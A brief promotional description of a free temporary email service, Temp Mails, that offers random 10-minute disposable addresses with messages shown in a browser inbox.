Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.